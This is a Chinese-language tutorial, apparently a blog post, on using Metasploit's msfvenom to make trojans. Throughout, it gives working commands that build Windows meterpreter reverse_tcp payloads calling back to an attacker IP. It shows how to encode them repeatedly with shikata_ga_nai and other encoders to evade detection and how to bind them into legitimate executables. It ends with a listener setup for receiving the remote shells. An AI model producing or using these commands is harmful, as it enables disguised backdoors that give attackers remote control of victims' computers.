metasploit 之 msfvenom的使用

metasploit 之 msfvenom的使用

  • msfvenom是msfpayload,msfencode的结合体,可以利用msfvenom生成木马程序,并在目标机上执行,在本地监听。

命令参数

  • 查看支持的系统平台:msfvenom --list platforms
  • 查看所有的payloads:msfvenom --list payloads
  • 查看payload支持什么平台、哪些选项,使用:msfvenom -p payloads的名字 --list-options
  • 查看编码方式:msfvenom --list encoder

木马制作

  • 在终端执行以下命令:(普通生成)msfvenom -p [payloads] [payload options] -f [format] -o [path]
  • -p 选择一个payload -f 生成的文件格式 -o(或者 > ) 输出路径
  • 如:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.12(kali ip) lport=4444 -f -o test.exe

  • 编码生成:
  • msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
  • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.8.12 lport=4444 -i 5 -e x86/shikata_ga_nai -b “\x00” -f exe -o payload.exe(使用x86/shikata_ga_nai方式对payload进行了5次编码,而且使用了-b参数去掉payload中的空字符)

  • 捆绑:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.12 LPORT=4444 -x 文件名.exe -f exe -o payload.ex
  • -x 指定捆绑到哪个程序

  • 编码+捆绑:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.12 LPORT=4444 -e x86/shikata_ga_nai -x 文件名.exe -i 15 -f exe -o payload.exe
  • 多重编码+捆绑:
  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.8.12 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 文件名.exe -f exe -o payload.exe
  • 以上命令,使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着 来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以文件名.exe为模板的可执行文件

实战

1、制作木马

  • 终端输入命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.8.12 lport=4444 -i 5 -e x86/shikata_ga_nai -f exe -o payload.exe
    metasploit 之 msfvenom的使用
    2、设置监听端口监听
  • 1、终端输入:msfconsole -q(安静模式)
  • 2、use exploit/multi/handler
  • 3、show options(查看需要配置哪些信息)
  • 4、set payload windows/meterpreter/reverse_tcp
  • 5、set lhost 192.168.8.12
  • 6、set lport 4444
  • 7、run
    metasploit 之 msfvenom的使用